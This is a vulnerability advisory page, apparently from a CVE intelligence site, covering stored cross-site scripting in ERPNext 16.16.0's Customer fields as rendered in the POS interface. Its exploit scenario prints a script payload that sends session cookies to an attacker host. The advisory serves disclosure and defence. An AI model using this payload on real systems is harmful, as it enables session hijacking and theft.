EUVD-2026-34157
GHSA-w2pq-xvqr-7fqw
Severity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Primary rating from NVD · only source for this CVE.
CVSS VectorNVD
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
3DescriptionCVE.org
An authenticated user can persist arbitrary HTML/JavaScript in the email_id or mobile_no fields of a Customer record and trigger unescaped rendering in the Point of Sale (POS) interface for every operator who selects that customer. This issue affects ERPNext: 16.16.0.
AnalysisAI
Stored cross-site scripting in ERPNext 16.16.0 allows authenticated users to inject arbitrary HTML and JavaScript into the email_id or mobile_no fields of Customer records, which execute silently in the browser of every Point of Sale (POS) operator who subsequently selects the poisoned customer. Because the payload persists in the database, a single injection event affects all future POS operator sessions that encounter that customer - creating a multiplier effect without requiring repeated attacker access. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires an authenticated ERPNext account with write access to Customer records - specifically permission to modify the email_id or mobile_no fields (confirmed by PR:L in the CVSS 4.0 vector). … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 4.0 score of 5.1 (Medium) accurately reflects a constrained but realistic threat: the attack is network-accessible (AV:N), low complexity (AC:L), requires no special attack conditions (AT:N), but does demand a low-privileged authenticated account (PR:L) and passive user interaction from a POS operator (UI:P). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An authenticated ERPNext user with Customer record edit access - such as a sales clerk, data entry operator, or compromised low-privilege account - saves a payload such as `<script>fetch('https://attacker.example/c?s='+document.cookie)</script>` into the email_id field of a frequently used customer record. The next time any POS operator opens the POS interface and selects that customer to process a transaction, the script silently exfiltrates the operator's session cookie to an attacker-controlled endpoint, enabling session hijacking and unauthorized access to POS and ERPNext functions under the operator's identity. … |
| Remediation | The primary remediation is to upgrade ERPNext beyond version 16.16.0 once a patched release is published by Frappe Technologies; as of this analysis, no specific fixed version has been confirmed - the upstream repository at https://github.com/frappe/erpnext and the Fluid Attacks advisory at https://fluidattacks.com/es/advisories/weeknd should be monitored for patch availability and associated release notes. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
Share
External POC / Exploit Code
Leaving vuln.today